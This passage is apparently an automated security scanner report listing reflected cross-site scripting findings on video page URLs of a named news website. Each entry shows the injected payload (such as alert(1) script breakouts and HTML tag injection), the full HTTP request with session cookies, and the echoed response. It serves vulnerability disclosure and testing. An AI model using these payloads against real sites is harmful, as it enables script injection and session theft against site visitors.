GET /video/latest-videos/latestccc48"-alert(1)-"092d67e8836/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:26 GMT
Date: Mon, 22 Nov 2010 00:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latestccc48"-alert(1)-"092d67e8836","1815816633","660653903001","glab-microsoft-kinect-fall-test-skyfire","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1149. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8c2"><a>b85cd2ddc5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestea8c2"><a>b85cd2ddc5a/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:41 GMT
Date: Mon, 22 Nov 2010 00:41:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestea8c2"><a>b85cd2ddc5a">
...[SNIP]...

1.1150. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d93e"-alert(1)-"00159d9461f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/18158166335d93e"-alert(1)-"00159d9461f/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:38 GMT
Date: Mon, 22 Nov 2010 00:42:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "18158166335d93e"-alert(1)-"00159d9461f","latest-videos","latest","660653903001","glab-microsoft-kinect-fall-test-skyfire","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1151. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d37"-alert(1)-"1aa3eddf2a9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire71d37"-alert(1)-"1aa3eddf2a9/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:47:34 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "glab-microsoft-kinect-fall-test-skyfire71d37"-alert(1)-"1aa3eddf2a9","latest-videos","latest","1815816633","660653903001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1152. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c41"-alert(1)-"bd7540ba6f8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/66065390300114c41"-alert(1)-"bd7540ba6f8 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:48:10 GMT
Date: Mon, 22 Nov 2010 00:43:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","glab-microsoft-kinect-fall-test-skyfire","66065390300114c41"-alert(1)-"bd7540ba6f8","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1153. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 80bd5--><script>alert(1)</script>b8bc6f2fc49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video80bd5--><script>alert(1)</script>b8bc6f2fc49/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29466
Vary: Accept-Encoding
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:40:07 GMT
Date: Mon, 22 Nov 2010 00:35:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video80bd5--><script>alert(1)</script>b8bc6f2fc49/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001
-->
...[SNIP]...

1.1154. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dc5"><a>8169029ab92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2dc5"><a>8169029ab92/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29427
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:39:28 GMT
Date: Mon, 22 Nov 2010 00:34:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2dc5"><a>8169029ab92 ss_latest-videos c_latest">
...[SNIP]...

1.1155. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee349"><a>f57f2580c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosee349"><a>f57f2580c56/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:27 GMT
Date: Mon, 22 Nov 2010 00:35:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosee349"><a>f57f2580c56 c_latest">
...[SNIP]...

1.1156. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 279cd"-alert(1)-"6a5aa6c2954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos279cd"-alert(1)-"6a5aa6c2954/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:13 GMT
Date: Mon, 22 Nov 2010 00:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106762


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer","latest","latest-videos279cd"-alert(1)-"6a5aa6c2954","1815816633","680254055001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1157. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ce3"><a>3ba2576a594 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestb1ce3"><a>3ba2576a594/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:15 GMT
Date: Mon, 22 Nov 2010 00:36:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestb1ce3"><a>3ba2576a594">
...[SNIP]...

1.1158. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21049"-alert(1)-"98b0f0a9714 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest21049"-alert(1)-"98b0f0a9714/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:42:04 GMT
Date: Mon, 22 Nov 2010 00:37:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer","latest-videos","1815816633","latest21049"-alert(1)-"98b0f0a9714","680254055001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1159. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdfee"-alert(1)-"dab3706a883 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633fdfee"-alert(1)-"dab3706a883/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:16 GMT
Date: Mon, 22 Nov 2010 00:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer","latest-videos","latest","1815816633fdfee"-alert(1)-"dab3706a883","680254055001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1160. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e01ee"-alert(1)-"5b4f05ec285 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailere01ee"-alert(1)-"5b4f05ec285/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:24 GMT
Date: Mon, 22 Nov 2010 00:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","680254055001","green-lantern-theatrical-trailere01ee"-alert(1)-"5b4f05ec285","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1161. http://www.wired.com/video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a0a0"-alert(1)-"b92fb7546c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/6802540550014a0a0"-alert(1)-"b92fb7546c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
